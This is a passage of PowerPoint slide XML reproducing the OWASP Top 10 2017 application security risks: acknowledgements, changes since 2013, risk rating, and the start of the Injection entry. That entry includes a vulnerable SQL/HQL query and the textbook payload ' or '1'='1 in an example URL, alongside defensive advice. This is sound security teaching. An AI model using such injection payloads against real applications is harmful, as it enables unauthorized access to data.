                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>dedicated page </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>to recognize the contributions made.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wish to give heartfelt thanks to these organizations for being willing to be on the front lines by publicly sharing vulnerability data from their efforts.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hope this will continue to grow and encourage more organizations to do the same and possibly be seen as one of the key milestones of evidence-based security.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OWASP Top 10 would not be possible without these amazing contributions.</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 big thank you to the more than 500 individuals who took the time to complete the industry ranked survey.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Your voice helped determine two new additions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additional comments, notes of encouragement, and criticisms were all appreciated.</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know your time is valuable and we wanted to say thanks.</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As much as possible, we have listed them on the ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Acknowledgements</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>’ page.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">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I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">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dirty="1" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Что изменилось в 2017 году с 2013 года?</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dirty="1"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We've completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re-written each risk from the ground up, and added references to frameworks and languages that are now commonly used.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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Architectural assumptions by the code, such as trusted callers, are no longer valid.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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data:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="1" i="0" u="none" strike="noStrike" noProof="0" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017-XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="1" i="0" u="none" strike="noStrike" noProof="0" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" i="0" u="none" strike="noStrike" noProof="0" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>is a new category primarily supported by </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>source code analysis security testing tools</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (SAST)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" i="0" u="none" strike="noStrike" noProof="0" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> data sets.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" i="0" u="none" strike="noStrike" noProof="0" sz="90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the community:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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After over 500 peer submissions, and removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="90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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="90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Merged or retired, but not forgotten:</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A4-Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="900" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="1" sz="900" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7-Missing Function Level Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="900" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>merged into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="1" sz="900" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="900" i="0" u="none" strike="noStrike" noProof="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dirty="1" i="0" u="none" strike="noStrike" noProof="0" b="1" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="1" sz="900">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" i="0" u="none" strike="noStrike" noProof="0" b="1" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" i="0" u="none" strike="noStrike" noProof="0" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> as many frameworks include </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" i="0" u="none" strike="noStrike" noProof="0" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CSRF defenses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" i="0" u="none" strike="noStrike" noProof="0" sz="90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A10-Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="0" sz="900" i="0" u="none" strike="noStrike"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rtl="0">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 </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1"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 – Injection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A1:2017-Injection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 – Broken Authentication and Session Management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A2:2017-Broken Authentication</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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 – Cross-Site Scripting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A3:2017-Sensitive Data Exposure</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A4 – Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A7]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A4:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML External Entities (XXE)</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 – Security Misconfiguration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A5:2017-Broken Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[Merged]</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 – Sensitive Data Exposure</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A6:2017-Security Misconfiguration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A7</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Missing</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Function</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Level</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Access</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Contr </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A4]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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting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A8 – Cross-Site Request Forgery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A8:2017-Insecure Deserialization</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A9 – Using Components with Known Vulnerabilities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A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Using Components with Known Vulnerabilities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 – Unvalidated Redirects and Forwards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A10:2017-Insufficient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Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="950" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW,Comm.]</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RN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">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dirty="1" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Are Application Security Risks?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Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</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Similarly, the harm that is caused may be of no consequence, or it</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 determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your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Together, these factors determine your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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">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sz="4000"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">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What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" u="sng" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Risk?</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dirty="1" sz="950">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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ru-RU" dirty="1"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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on 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ru-RU" dirty="1" sz="95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 more details, please see </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" b="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If a public interest organization uses a content management system (CMS) for public information and a health system uses that same exact CMS for sensitive health records, the threat actors and business impacts can be very different for the same software.</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It is critical to understand the risk to your organization based on applicable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0"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p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>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Widespread:</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Severe:</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Moderate</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Uncommon:</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Minor:</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Risk Management Std</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ISMS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T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1"/>
              <a:t>Risks – 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="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may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes.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This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information.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A7:2017-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Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.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If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover.</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Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.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Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.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A10:2017-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An application uses untrusted data in the construction of the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" b="1" u="sng" sz="900">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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query = "SELECT</a:t>
            </a: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 FROM accounts WHERE</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#2</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Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)):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Query HQLQuery = session.createQuery("FROM accounts</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WHERE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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0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 or '1'='1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For example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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http://example.com/app/accountView?id=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or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rgbClr val="C0000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concept is identical among all interpreters.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Source code review is the best method of detecting if applications are vulnerable to injections, closely followed by thorough automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs.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Organizations can include static source (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) and dynamic application test (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="90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Parameterize Queries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ASVS:</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V5 Input Validation and Encoding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SQL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Command Injection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1"/>
              </a:rPr>
